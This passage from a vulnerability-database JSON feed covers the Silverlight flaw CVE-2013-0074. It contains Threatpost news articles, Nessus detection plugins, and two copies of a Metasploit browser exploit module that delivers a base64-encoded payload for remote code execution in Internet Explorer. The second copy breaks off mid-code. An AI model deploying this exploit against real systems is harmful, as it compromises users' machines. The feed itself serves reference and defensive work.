applications, saying that it will deliver patches for Windows Store apps as they become available.\n\n\u201cProviding security updates to Windows Store apps more frequently will allow us to add new functionality, fix issues and improve security. 
This will also help developers to avoid introducing new issues during the update process,\u201d Microsoft Security Response Center senior director Mike Reavey wrote in a [blogpost](<http://blogs.technet.com/b/msrc/archive/2013/03/12/microsoft-apps-updates-policy.aspx>) today.\n\nAs for IE, the security of the browser has been headline news for much of the year, starting with watering hole attacks against a number of political and government sites right through last week\u2019s Pwn2Own contest at the CanSecWest Conference in Vancouver. Researchers at security company [VUPEN compromised IE 10 running on a Windows 8 machine](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) to earn $100,000 in prize money. While similar vulnerabilities were exploited in Firefox and Chrome during Pwn2Own, Mozilla and Google were able to deliver patches within days of the contest, unlike Microsoft.\n\nToday\u2019s IE patches, [MS13-021](<https://technet.microsoft.com/en-us/security/bulletin/ms13-021>), address nine use-after free vulnerabilities, one of which ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>)) is being exploited in the wild; users have to be lured via IE to a site controlled by the attacker that is hosting an exploit. The exploit was built for a Metasploit module written one month ago for [MS13-009](<https://technet.microsoft.com/en-us/security/bulletin/ms13-009>), which was patched in February, and [still works against a fully patched version of IE 8](<http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf>).\n\n\u201cThe attack vector is through a webpage that anybody with access to Metasploit can set up quite easily,\u201d said Qualys CTO Wolfgang Kandek. 
\u201cYou are going to want to patch this as quickly as possible.\u201d\n\nMicrosoft also addressed a trio of Kernel-Mode Driver vulnerabilities in [MS13-027](<http://technet.microsoft.com/en-us/security/bulletin/MS13-027>) that could be exploited by an attacker using a malicious USB drive to gain root access on a machine. Known as the evil maid attack, these types of attacks can be pulled off by anyone with physical access to a machine. Attacks such as Stuxnet were also initiated via infected USB sticks.\n\n\u201cWhile this isn\u2019t the first issue to leverage physical access and USB devices, it is different in that it doesn\u2019t require a machine to be logged on. It also provides kernel-level code execution where previous attacks only allowed code execution at the logged-on level,\u201d wrote Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\n\u201cBecause of this, someone with casual physical access, such as a custodian sweeping your office at night or a security guard making his rounds, could simply plug in a USB device to perform any action as an administrator,\u201d Childs said. \u201cThis is much different than _unrestricted_ physical access, where that same person would have to steal your machine, boot it using removable media, and decrypt files on the hard drive.\u201d\n\nThree other critical bulletins were released today. [MS13-022](<http://technet.microsoft.com/en-us/security/bulletin/ms13-022>) patches a remote code execution vulnerability in Microsoft Silverlight; users would have to visit a website hosting a malicious Silverlight application in order to be exploited. The vulnerability, known as a [double dereference vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>), could allow Silverlight applications to access memory in an unsafe manner, Microsoft said.\n\nMicrosoft also patched another remote code execution flaw in Microsoft Visio Viewer 2010. 
[MS13-023](<http://technet.microsoft.com/en-us/security/bulletin/ms13-023>) describes how malicious Visio files could exploit a Visio Viewer Tree Object Type Confusion vulnerability, which lies in the way the viewer handles memory when rendering Visio files.\n\nThe final critical bulletin, [MS13-024](<http://technet.microsoft.com/en-us/security/bulletin/ms13-024>), is for SharePoint. The patch addresses four vulnerabilities, including a cross-site scripting bug, that could lead to privilege escalation if a user follows a URL to a malicious SharePoint site. Qualys\u2019 Kandek said an attacker could spike a search query with malicious code to initiate an exploit. \u201cLater when an admin reviews the queries, the code is run in the admin\u2019s context giving full control to the attacker,\u201d Kandek said.\n\nThe remaining two bulletins were rated important and are both information disclosure vulnerabilities in Microsoft OneNote, [MS13-025](<http://go.microsoft.com/fwlink/?LinkId=282355>), and Office Outlook for Mac, [MS13-026](<http://go.microsoft.com/fwlink/?LinkId=280673>).\n\n_This article was updated to clarify that one of the IE vulnerabilities was previously disclosed, and is not being exploited in the wild._\n", "modified": "2013-05-08T14:22:48", "published": "2013-03-12T18:28:50", "id": "THREATPOST:616CAD98C622760276F2D4E79A091E01", "href": "https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/77615/", "type": "threatpost", "title": "Critical IE, Windows Kernel Flaws Patched", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "bulletinFamily": "info", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader and Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs, dug deeper into the kit, known as 
Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 machines to see if it\u2019s running a 64-bit version of Internet Explorer.\n\nIf a victim is caught running an outdated version of Flash, the kit will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. 
The kit exploits a vulnerability, [CVE-2013-0074](<threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), that was patched in March 2013; it targets Silverlight 5 and leaves systems running it open to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. [Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another exploit kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January, while this summer men\u2019s lifestyle site AskMen.com was spotted directing users to the Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. 
[Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "modified": "2014-09-16T21:25:57", "published": "2014-09-16T17:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:15:51", "bulletinFamily": "scanner", "description": "The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.", "modified": "2018-07-14T00:00:00", "published": "2013-03-12T00:00:00", "id": "MACOSX_MS13-022.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65216", "title": "MS13-022: Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65216);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-0074\");\n script_bugtraq_id(58327);\n script_xref(name:\"MSFT\", value:\"MS13-022\");\n script_xref(name:\"MSKB\", value:\"2814124\");\n\n script_name(english:\"MS13-022: Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) (Mac 
OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected a remote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/12\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-022\";\nfixed_version = \"\";\n\n# nb: Multiple installs of Silverlight are not possible.\nif (version =~ \"^5\\.\")\n{\n fixed_version = \"5.1.20125.0\";\n kb = \"2814124\";\n}\n\nif (fixed_version && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:51", "bulletinFamily": "scanner", "description": "The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an 
attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.", "modified": "2018-11-15T00:00:00", "published": "2013-03-12T00:00:00", "id": "SMB_NT_MS13-022.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65211", "title": "MS13-022: Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (2814124)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(65211);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2013-0074\");\n script_bugtraq_id(58327);\n script_xref(name:\"MSFT\", value:\"MS13-022\");\n script_xref(name:\"MSKB\", value:\"2814124\");\n\n script_name(english:\"MS13-022: Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (2814124)\");\n script_summary(english:\"Checks version of Silverlight.exe\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A browser enhancement on the remote Windows host could allow arbitrary\ncode execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-022\");\n 
script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"silverlight_detect.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 
'MS13-022';\nkb = \"2814124\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\n# Silverlight 5.x\nver = get_kb_item(\"SMB/Silverlight/Version\");\nfix = '5.1.20125.0';\n\nif (!isnull(ver) && ver =~ '^5\\\\.' && ver_compare(ver:ver, fix:fix) == -1)\n{\n path = get_kb_item(\"SMB/Silverlight/Path\");\n report +=\n '\\n Product : Microsoft Silverlight' +\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n hotfix_add_report(report, bulletin:bulletin, kb:kb);\n\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-03T01:35:16", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2013-11-27T00:00:00", "published": "2013-11-27T00:00:00", "id": "1337DAY-ID-21575", "href": "https://0day.today/exploit/description/21575", "type": "zdt", "title": "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n 
<Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' 
=> false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n my_payload = get_payload(cli, target_info)\r\n \r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n end\r\n \r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n \r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' 
=> 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21575"}, {"lastseen": "2018-03-13T01:18:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. 
This Metasploit module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1 on both x32 and x64 architectures.", "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "1337DAY-ID-21573", "href": "https://0day.today/exploit/description/21573", "type": "zdt", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + 
my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n 